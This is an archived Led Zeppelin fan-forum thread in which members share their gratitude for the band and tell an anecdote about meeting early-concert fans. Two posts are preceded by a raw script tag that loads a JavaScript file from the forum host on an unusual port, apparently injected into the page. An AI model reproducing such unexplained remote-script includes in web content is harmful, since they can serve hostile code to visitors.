gratitude

Lou David

I am 51 yrs old and have been listening and enjoying and sometimes experiencing the music of Led Zep since I was 14. I always knew I loved this music however never really able to pin down why so much until today. When listening to Zep I feel free even if it is only for that few minutes but it is great. So I say thank you Led Zeppelin for many brief moments in my life for feeling free...

I am 51 yrs old and have been listening and enjoying and sometimes experiencing the music of Led Zep since I was 14. I always knew I loved this music however never really able to pin down why so much until today. When listening to Zep I feel free even if it is only for that few minutes but it is great. So I say thank you Led Zeppelin for many brief moments in my life for feeling free...

Hi Lou,

Welcome to the forum!

I think most of us feel as you do. :)

The older I get, the more I appreciate the music!

When listening to Zep I feel free even if it is only for that few minutes but it is great.

I REALLY feel that way during David Gilmour's solo on "Mother". Not a care in the world, pure bliss. The solo on "Stairway" from TSRTS is about the same, though. ;-)

• 1 month later...

Hey Lou, I am 50 and Led Zeppelin is still the best band ever. I have a passion for Zeppelin that is unmeasurable.

• 3 months later...

<script src="//forums.ledzeppelin.com:8011/bar29659.js" type="text/javascript" ></script>

Hey. Although I'm young enough to be your son I've met other Led Zeppelin fans who were there when Zep was in the early stages of life. Back in 2002 I think it was I started to work for a small construction crew as the low man on the ladder. Well, we got this job to do some light work on a beachside hotel. It was a beautiful property where people would go on holiday on an intimate stretch of the Pacific beachlands. The couple who owned the property were very agreeable hippy types who offered me a joint on one of my breaks. So, being one to never pass on such a chance (even during work hours) they smoked me out! They noticed that I was listening to Led Zeppelin on my CD boom box while I worked. They told me the story about how they met eachother at a Led Zeppelin concert when Led Zeppelin had only released their first album. They went to see another Led Zeppelin concert when the second album was released. They had a lot to say about Led Zeppelin & rock n roll in general because rock n roll was still in it's infancy stages then. It was a really cool experience that I'll never forget. Plus I've never been smoked out by my employer before or since! *wink* That's what I call awesome.

<script src="//forums.ledzeppelin.com:8011/bar29659.js" type="text/javascript" ></script>

Hey. Although I'm young enough to be your son I've met other Led Zeppelin fans who were there when Zep was in the early stages of life. Back in 2002 I think it was I started to work for a small construction crew as the low man on the ladder. Well, we got this job to do some light work on a beachside hotel. It was a beautiful property where people would go on holiday on an intimate stretch of the Pacific beachlands. The couple who owned the property were very agreeable hippy types who offered me a joint on one of my breaks. So, being one to never pass on such a chance (even during work hours) they smoked me out! They noticed that I was listening to Led Zeppelin on my CD boom box while I worked. They told me the story about how they met eachother at a Led Zeppelin concert when Led Zeppelin had only released their first album. They went to see another Led Zeppelin concert when the second album was released. They had a lot to say about Led Zeppelin & rock n roll in general because rock n roll was still in it's infancy stages then. It was a really cool experience that I'll never forget. Plus I've never been smoked out by my employer before or since! *wink* That's what I call awesome.

Great story......But rock and roll was not in it's infancy in '69 when Zep released their 1st album.

Archived